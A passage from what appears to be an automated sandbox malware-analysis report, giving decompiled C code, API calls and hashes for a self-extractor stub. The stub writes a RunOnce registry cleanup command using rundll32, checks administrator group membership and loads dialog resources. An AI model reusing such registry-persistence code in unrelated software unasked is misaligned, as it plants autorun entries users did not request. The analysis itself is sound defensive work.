                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000228A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000228AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 000228B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000227E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: 23377a75e18de90fd6a2f0f18e868625463d7f7dda2826985472ff6d1cb477a5
                                                                                                                                                                                                                                                • Instruction ID: 6805a57efd774fe4f31fdde95f499c060f5fe498b3d8ac115f65f37ad612052e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23377a75e18de90fd6a2f0f18e868625463d7f7dda2826985472ff6d1cb477a5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41A371A0113CAFEB249B64AC85AFE77BDEB55700F1040A9F549D2101DF748EC68FA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E00022267() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v836;
                                                                                                                                                                                                                                                				void* _v840;
                                                                                                                                                                                                                                                				int _v844;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t42;
                                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t19 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				if( *0x28530 != 0) {
                                                                                                                                                                                                                                                					_push(_t49);
                                                                                                                                                                                                                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                                						_push(_t38);
                                                                                                                                                                                                                                                						_v844 = 0x238;
                                                                                                                                                                                                                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                                							_push(_t47);
                                                                                                                                                                                                                                                							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                								E0002658A( &_v268, 0x104, 0x21140);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                                							E0002171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                                							_t42 =  &_v836;
                                                                                                                                                                                                                                                							_t45 = _t42 + 1;
                                                                                                                                                                                                                                                							_pop(_t47);
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t33 =  *_t42;
                                                                                                                                                                                                                                                								_t42 = _t42 + 1;
                                                                                                                                                                                                                                                							} while (_t33 != 0);
                                                                                                                                                                                                                                                							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                                						_pop(_t38);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_pop(_t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000222A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 000222D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 000222F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00022305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0002236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0002237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00022321
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0002232D
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00022299
                                                                                                                                                                                                                                                • wextract_cleanup1, xrefs: 0002227C, 000222CD, 00022363
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                                • API String ID: 3027380567-2048191181
                                                                                                                                                                                                                                                • Opcode ID: 430295608c805dc8da5d10ab0734e02d05e7756483c0471ff72c740435caa064
                                                                                                                                                                                                                                                • Instruction ID: a2aaa3018aa8a6738f874fc52ccb5028d307083fbd66f3bc64f8f2eed741a8aa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 430295608c805dc8da5d10ab0734e02d05e7756483c0471ff72c740435caa064
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8231D671A00238ABDB71DB50EC89FEAB77CEF15740F0001E5B90DAA051DA756F89CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E00023100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				struct HWND__* _t16;
                                                                                                                                                                                                                                                				struct HWND__* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					if( *0x28590 == 0) {
                                                                                                                                                                                                                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                                						 *0x28590 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t8 - 1;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                					EndDialog(_a4, ??);
                                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                                				if(_t15 == 0) {
                                                                                                                                                                                                                                                					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t33 = _a4;
                                                                                                                                                                                                                                                					E000243D0(_t33, _t16);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t33, 0x834,  *0x28d4c);
                                                                                                                                                                                                                                                					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                                					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                                					 *0x288b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                                					SetWindowLongA(_t34, 0xfffffffc, E000230C0);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t15 != 1) {
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_a12 != 6) {
                                                                                                                                                                                                                                                					if(_a12 != 7) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0002313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0002314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0002316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00023176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0002317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 00023185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00023190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,000230C0), ref: 000231A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000231CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 80eb629a0bdfed7cc847c25389800ed53e5ba8f237b2489fff96ad146783eb00
                                                                                                                                                                                                                                                • Instruction ID: 9c40ec3978b72a92f2510212eba8db702db38b3b52002b1d42430339e5029ab8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80eb629a0bdfed7cc847c25389800ed53e5ba8f237b2489fff96ad146783eb00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5811AF31645235FBEB315B28BC0CB9A3AA4FB4B730F204611F915A51E0DF7C8662C792
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E000218A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				long _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				long _t45;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t51 = __esi;
                                                                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                                                                				_t23 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                                				_t25 =  *0x28128; // 0x2
                                                                                                                                                                                                                                                				_t45 = 0;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t50 = 2;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if(_t25 != _t50) {
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					return E00026CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E000217EE( &_v20) != 0) {
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                                                                                                                						 *0x28128 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                                					L17:
                                                                                                                                                                                                                                                					CloseHandle(_v28);
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_push(__esi);
                                                                                                                                                                                                                                                					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                                					if(_t52 == 0) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						_pop(_t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                                						L15:
                                                                                                                                                                                                                                                						LocalFree(_t52);
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if( *_t52 <= 0) {
                                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                                							FreeSid(_v32);
                                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                                						_t50 = _t15;
                                                                                                                                                                                                                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                                							_t45 = _t45 + 1;
                                                                                                                                                                                                                                                							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x28128 = 1;
                                                                                                                                                                                                                                                						_v20 = 1;
                                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000218DD), ref: 0002181A
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0002182C
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: AllocateAndInitializeSid.ADVAPI32(000218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000218DD), ref: 00021855
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: FreeSid.ADVAPI32(?,?,?,?,000218DD), ref: 00021883
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: FreeLibrary.KERNEL32(00000000,?,?,?,000218DD), ref: 0002188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000218EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 000218F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0002190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00021918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0002192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00021944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00021964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 0002197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 0002199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 000219A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000219AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                • Opcode ID: b997b33f0915d6422ea6c8ab62005f5fe58c26146ea874cb8c5d2b55a25bfee0
                                                                                                                                                                                                                                                • Instruction ID: 6dbbc8cbc6297e6e824fbe44833be22d76c77e3e3b5289b413773a50aa87f99b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b997b33f0915d6422ea6c8ab62005f5fe58c26146ea874cb8c5d2b55a25bfee0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0316D71A00219AFEB20DFA5EC88AFFBBBCFF19300F204429E945D2150DB349946CB61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E0002468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				CHAR* _t14;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				long _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 = __ecx;
                                                                                                                                                                                                                                                				_t11 = __edx;
                                                                                                                                                                                                                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                                				_t16 = _t4;
                                                                                                                                                                                                                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                                					if(_t16 == 0) {
                                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                                					FreeResource(_t15);
                                                                                                                                                                                                                                                					return _t16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                • Opcode ID: 0e6658d789b2ef2661b5c3eb524583bce256fc442edb2de36d396d761ccf2bb5
                                                                                                                                                                                                                                                • Instruction ID: 6da69853ca7d03876c537d6135debc339513ed371ea6ea309620c378a0360f63
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e6658d789b2ef2661b5c3eb524583bce256fc442edb2de36d396d761ccf2bb5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0501D1323402207BF3301BA57C4CF2B7E6CEBCBB62F150014FE4A86180CDA5884682A7
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E000217EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                                				intOrPtr* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				signed int _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t37 = __ecx;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v28 = __ecx;
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                                					_v20 = _t20;
                                                                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                                                                						 *_t37 = 0;
                                                                                                                                                                                                                                                						_t28 = 1;
                                                                                                                                                                                                                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                                							_t37 = _t39;
                                                                                                                                                                                                                                                							 *0x2a288(0, _v24, _v28);
                                                                                                                                                                                                                                                							_v20();
                                                                                                                                                                                                                                                							if(_t39 != _t39) {
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							FreeSid(_v24);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					FreeLibrary(_t36);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000218DD), ref: 0002181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0002182C
